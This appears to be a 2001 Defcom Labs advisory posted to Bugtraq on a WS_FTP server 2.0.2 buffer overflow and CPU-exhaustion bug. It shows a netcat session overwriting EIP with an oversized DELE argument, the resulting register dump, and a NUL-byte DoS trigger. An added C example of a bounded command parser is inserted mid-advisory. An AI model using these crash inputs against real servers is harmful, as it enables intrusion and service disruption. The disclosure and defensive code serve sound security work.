def-2001-28 - WS_FTP server 2.0.2 Buffer Overflow and possible DOS

From: andreas junestam (andreas.junestam@defcom.com)
Date: 07/26/01


Message-ID: <3B600C29.DADDFC63@defcom.com>
Date: Thu, 26 Jul 2001 13:25:13 +0100
From: andreas junestam <andreas.junestam@defcom.com>
To: bugtraq@securityfocus.com
Subject: def-2001-28 - WS_FTP server 2.0.2 Buffer Overflow and possible DOS



======================================================================
                  Defcom Labs Advisory def-2001-28

         WS_FTP server 2.0.2 Buffer Overflow and possible DOS

Author: Andreas Junestam <andreas@defcom.com>
Co-Author: Janne Sarendal <janne@defcom.com>
Release Date: 2001-07-26
======================================================================
------------------------=[Brief Description]=-------------------------
WS_FTP server 2.0.2 contains a buffer overflow which affects the
following commands:
* DELE
* MDTM
* MLST
* MKD
* RMD
* RNFR
* RNTO
* SIZE
* STAT
* XMKD
* XRMD
This buffer overflow gives an attacker the ability to run code on
the target with SYSTEM RIGHTS, because the server runs as a service
by default. Note: this is only valid when logged in as an anonymous
user, not as an ordinary one.

The server also contains an easy-to-trigger DoS.

------------------------=[Affected Systems]=--------------------------
- WS_FTP server 2.0.2; other versions have not been tested

----------------------=[Detailed Description]=------------------------
* Command Buffer Overrun
  All the above-mentioned commands seem to use the same parsing
  code, which suffers from a buffer overflow. By sending a command with
  an argument longer than 478 bytes (474 bytes of buffer plus the new
  return address), the buffer overflows and EIP is overwritten. A
  proof-of-concept exploit is attached to the advisory; it works
  against WS_FTP server 2.0.2 running on WIN2K (Professional and
  Server, any SP).

  C:\tools\web>nc -nvv 127.0.0.1 21
  (UNKNOWN) [127.0.0.1] 21 (?) open
  220-helig2 X2 WS_FTP Server 2.0.2.EVAL (48732520)
  220-Tue Jun 19 14:00:21 2001
  220-30 days remaining on evaluation.
  220 helig2 X2 WS_FTP Server 2.0.2.EVAL (48732520)
  user ftp
  331 Password required
  pass ftp
  230 user logged in
  DELE AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

  Access violation - code c0000005 (first chance)
  eax=000000ea ebx=0067c278 ecx=000000ea edx=00000002 esi=0067c278
  edi=77fca3e0
  eip=41414141 esp=0104df88 ebp=41414141 iopl=0 nv up ei pl zr
  na po nc
  cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000
  efl=00010246

* Possible DOS
  By sending a couple of NULL (0x00) characters, the WS_FTP Server
  will spike to 100% CPU.
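Both findings above come down to the command parser trusting the length and content of what the client sends. The following is an added example, not code from Ipswitch or from Defcom Labs, of how a bounded FTP command-line parser rejects the two input classes described: an argument that would not fit a fixed buffer (the 474-byte figure is the advisory's; the check happens before any copy, so EIP is never reachable), and a line carrying NUL bytes (the advisory does not say what the server does with them, so the example simply refuses them up front and answers with a 5xx reply). The limits, names and reply strings other than 474 are assumptions chosen for illustration.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Added example, not code from Ipswitch or Defcom Labs: a bounded parser
 * for one FTP command line that rejects oversized arguments and embedded
 * NUL bytes before any fixed-size copy takes place.  FTP_ARG_MAX is the
 * 474-byte figure from the advisory; every other name, limit and reply
 * string here is an assumption chosen for illustration. */

#define FTP_ARG_MAX  474   /* argument buffer size quoted in the advisory */
#define FTP_LINE_MAX 512   /* assumed hard cap on one raw command line   */

enum ftp_parse_result {
    FTP_OK = 0,
    FTP_ERR_EMPTY,         /* no verb on the line                        */
    FTP_ERR_SYNTAX,        /* verb longer than any FTP verb              */
    FTP_ERR_NUL,           /* embedded 0x00 byte anywhere on the line    */
    FTP_ERR_ARG_TOO_LONG,  /* argument would not fit in the fixed buffer */
    FTP_ERR_LINE_TOO_LONG  /* raw line exceeds FTP_LINE_MAX              */
};

struct ftp_command {
    char   verb[8];              /* FTP verbs are at most 4 letters (DELE, XMKD, ...) */
    char   arg[FTP_ARG_MAX + 1]; /* bounded copy, always NUL-terminated               */
    size_t arg_len;
};

/* Parse 'len' raw bytes of one command line into *out.  The length is passed
 * explicitly so that NUL bytes can be detected; strlen() would stop at the
 * first 0x00 and hide whatever follows it. */
enum ftp_parse_result ftp_parse_line(const char *line, size_t len,
                                     struct ftp_command *out)
{
    size_t i = 0, v = 0, arg_len;

    memset(out, 0, sizeof *out);
    if (len > FTP_LINE_MAX)
        return FTP_ERR_LINE_TOO_LONG;
    if (memchr(line, '\0', len) != NULL)
        return FTP_ERR_NUL;

    /* Strip the trailing CRLF (or a bare LF). */
    while (len > 0 && (line[len - 1] == '\r' || line[len - 1] == '\n'))
        len--;

    /* Verb: everything up to the first whitespace, upper-cased, bounded. */
    while (i < len && !isspace((unsigned char)line[i])) {
        if (v >= sizeof out->verb - 1)
            return FTP_ERR_SYNTAX;
        out->verb[v++] = (char)toupper((unsigned char)line[i]);
        i++;
    }
    if (v == 0)
        return FTP_ERR_EMPTY;

    /* Argument: the rest of the line after the separating whitespace.
     * The length check happens BEFORE the copy into the fixed buffer. */
    while (i < len && isspace((unsigned char)line[i]))
        i++;
    arg_len = len - i;
    if (arg_len > FTP_ARG_MAX)
        return FTP_ERR_ARG_TOO_LONG;
    memcpy(out->arg, line + i, arg_len);
    out->arg[arg_len] = '\0';
    out->arg_len = arg_len;
    return FTP_OK;
}

/* Reply to send for a rejected line (NULL means the line parsed cleanly). */
const char *ftp_reject_reply(enum ftp_parse_result r)
{
    switch (r) {
    case FTP_OK:                return NULL;
    case FTP_ERR_EMPTY:         return "500 Empty command";
    case FTP_ERR_SYNTAX:        return "500 Syntax error, command unrecognized";
    case FTP_ERR_NUL:           return "501 Control characters not allowed";
    case FTP_ERR_ARG_TOO_LONG:  return "501 Argument too long";
    case FTP_ERR_LINE_TOO_LONG: return "500 Line too long";
    }
    return "500 Internal error";
}

int main(void)
{
    struct ftp_command cmd;
    char big[FTP_LINE_MAX];

    /* Constructed input 1: the advisory's DELE with 478 'A's (no CRLF). */
    memcpy(big, "DELE ", 5);
    memset(big + 5, 'A', 478);
    printf("oversized DELE -> %s\n",
           ftp_reject_reply(ftp_parse_line(big, 5 + 478, &cmd)));

    /* Constructed input 2: a handful of NUL bytes, as in the DoS report. */
    printf("NUL bytes      -> %s\n",
           ftp_reject_reply(ftp_parse_line("\0\0\0\0\r\n", 6, &cmd)));

    /* Constructed input 3: an ordinary command parses normally. */
    if (ftp_parse_line("dele old.txt\r\n", 14, &cmd) == FTP_OK)
        printf("normal DELE    -> verb=%s arg=%s (%zu bytes)\n",
               cmd.verb, cmd.arg, cmd.arg_len);
    return 0;
}
```

The design point is that the raw byte count, not strlen(), drives every decision, and the argument length is compared against the buffer size before memcpy() runs; a server written this way answers the 478-byte DELE with a 501 and keeps its return address intact.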

---------------------------=[Workaround]=-----------------------------

Download the new version from:
http://www.ipswitch.com/Support/WS_FTP-Server/patch-upgrades.html

-----------------------------=[Exploit]=------------------------------
See attached file, ws_ftp.pl

-------------------------=[Vendor Response]=--------------------------
This issue was brought to the vendor's attention on the 18th of
June, 2001. A patch has been released.

======================================================================
            This release was brought to you by Defcom Labs

              labs@defcom.com www.defcom.com
======================================================================





